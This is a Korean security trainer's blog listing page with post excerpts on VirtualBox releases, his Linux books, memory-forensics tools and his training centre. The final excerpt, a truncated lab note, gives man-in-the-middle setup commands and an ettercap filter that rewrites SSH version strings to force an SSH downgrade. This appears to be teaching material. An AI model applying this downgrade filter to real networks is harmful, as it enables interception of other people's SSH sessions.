본문 바로가기

버추얼박스 5.2. 베타 1 릴리즈(VirtualBox 5.2 Beta Release 1) 테크넷 마스터 김재벌 입니다. 8월 3일에 (한국시간 기준)으로 제가 7월 말에 릴리즈된 5.1.26 릴리즈를 소개해 드렸는데.. 8월 3일 ( 미국시간 -> 한국시간 기준 8월 4일) 에 버추얼박스 5.2 Beta 1이 릴리즈 되었네요. 해당 버전은 베타인 관계로 테스트 용으로만 사용해야 하며 , 실 환경에서의 사용은 알려지지 않은 버그나, 안정성을 이유로 권장되지 않습니다. 아래는 공식 사이트에서 제공하는 변경 사항입니다. VirtualBox 5.2 will be a new minor release. Here is an incomplete list of changes:VM export to Oracle Cloud (OPC)Unattended guest installation (bug #5810; se..
버추얼박스 5.1.26 릴리즈 테크넷 마스터 김재벌 입니다. 며칠간 몸살 때문에 정신을 못차렸는데...ㅠㅠ 2017년 7월에만 두번의 버추얼 박스 업데이트가 있었어요. 버그 픽스들인데 , 한동안 업데이트 없다가 갑작스레 두번의 업데이트가 있었네요. NVMe 컨트롤러 에뮬레이터 행 문제도 해결된 듯 하고 , 사운드 에뮬레이팅 문제도 해결 될 듯 합니다.AMD 라이젠 지원 관련 문제도 어느정도 해소 될 듯 하네요. 참고들 하시길. This is a maintenance release. The following items were fixed and/or added:VMM: reset the TSC on VM reset to work around a Windows bug (bug #16643)Audio: fixed memory leak wh..
테크넷과 함께하는 엔터프라이즈 리눅스 핵심 운영 가이드 vol.2 가 출간되었습니다. 테크넷 마스터 김재벌입니다. 테크넷과 함께 하는 엔터프라이즈 리눅스 볼륨 2 가 출간되었습니다. 나름 시중교재와 차별화를 위해 노력했습니다만, 여전히 책은 출간하고 나면 아쉬움이 많이 남는 것 같습니다. RHEL / CentOS / Oracle Linux 7.3 버전 기준으로 집필되어 있습니다. 기존 책들과 달리 SElinux , FreeIPA (LDAP) 같은 보안 구성요소와 iSCSI 와 같은 블록스토리지 기술과 GlusterFS 같은 소프트웨어 정의 스토리지 기술도 포함되어 있습니다. 또한, 데이터베이스로 오라클 DB는 물론, MariaDB/MySQL 과 PostgreSQL 까지 오픈소스 DB 들을 소개 설치 하는 부분도 다루어 두었습니다. JBoSS의 커뮤니티 에디션인 와일드 플라이드 설치에 대해..
테크넷과 함께하는 엔터프라이즈 리눅스 핵심 운영 가이드 vol.1 탈고 및 출간 테크넷 마스터 김재벌입니다. 어쩌다 보니 , 책을 또 출간하게 되었습니다. 사실 vol.2 는 지난주에 출간되었고 , vol.1은 지난 4월에 출간되었는데 , 페이스북에 지인분들께만 소개해 드리고 딱히 블로그에 포스팅은 안했네요. (vol.2 에 대해서는 별도 포스팅하도록 하겠습니다.) 엔터프라이즈 리눅스 핵심 운영 가이드 vol.1 은 기존의 솔라리스 11으로 배우는 입문 서적에서 다룬 기초이외에 실제 리눅스 시스템을 다루어야 하는 기술에 대해서 다룹니다. 입문서적은 이 녀석 이었지요? 수정 탈고본을 반영해서 지난번에 2차 개정판이 출간되었습니다. 2017년 4월에 출간된 녀석은 바로 아래 녀석이구요. RHEL 이나 Oracle Linux , CentOS 7.3을 기반으로 작성되었으며, 순수 관리 내용..
comae.io 메모리 분석 도구 모음 ( dumpit ) 포함 안녕하세요 테크넷 마스터 김재벌 입니다..^^ 침해사고 대응을 위해서 다양한 도구가 활용되는데 , 그중에 메모리 포렌식을 위해 메모리 덤프는 필수적이죠. 그중에 널리 사용되는것이 moonsols 의 dumpit 인데 , 어느날 찾아보니 , 사이트가 리뉴얼 되고 툴 구하는게 어려워져서 저도 가지고 있는 버전만 활용했었습니다. 그런데 , moonsols 가 아래 사이트로 변경되고 툴도 세트 형태로 나오더군요. https://my.comae.io/login 해당 도구를 다운 받기 위해서는 회사 메일이 있어야만 가능하고 , 인증 메일로만 로그인도 가능해서 공부하시는 분들이 활용하기에는 어려워 보여서 아예 다운 받아서 공유해 둡니다. dumpit 이외에도 Bin2DMP.exe , DMP2Bin.exe , Hibr..
레드햇 공인 교육 및 시험센터 - 노브레이크 부설 교육센터 테크넷 마스터 김재벌입니다. 어쩌다 보니 , 우리 회사가 벌써 레드햇 공인 교육센터 http://www.nobreak.co.kr/ 를 운영한지 2년이 후딱 갔네요. 저희 회사 홈페이지 입니다.. 나중에 개편이 좀 필요하긴 할것 같은데...^^ 오늘의 포스팅은 교육 파트에 대한 그것도 레드햇공인교육 관련 주제만 다룰 예정이라..추가적인 포스팅은 별도로 진행하겠습니다. 그동안 대기업 고객 , 공공기관 , 오픈소스 관련 기업, 학생들을 대상으로 정신없이 교육이 진행된 것 같네요.거의 쉴틈 없이 일년내내 교육이 진행이 되었습니다. 저희 회사는 보안 컨설팅 / 교육컨설팅을 주력으로 하고 있습니다. 법인 설립은 2012년도에 했으니, 5년차 이구요. 다양한 기업/교육기관에 강사 파견과 교육/보안컨설팅 , 연구과제를..
MITMF 를 이용한 공격 기법 - 파일 다운로드 보호되어 있는 글입니다.
SSH Downgrade Attack - Note ================================================A client (putty가 있는 xp)Putty.exe 실행 --> SSH를 이용 192.168.30.192(server 접속)=================================================공격자 셋팅1. 첫번째 터미널 #echo "1" > /proc/sys/net/ipv4/ip_forward #cat /proc/sys/net/ipv4/ip_forward (반드시 1로 셋팅되어야 한다.) 2. 두번째 터미널 #cat > sshdown.ecf if ( search(DATA.data, "SSH-1.99") ) { replace("SSH-1.99","SSH-1.5"); } (ctrl + d 를 동..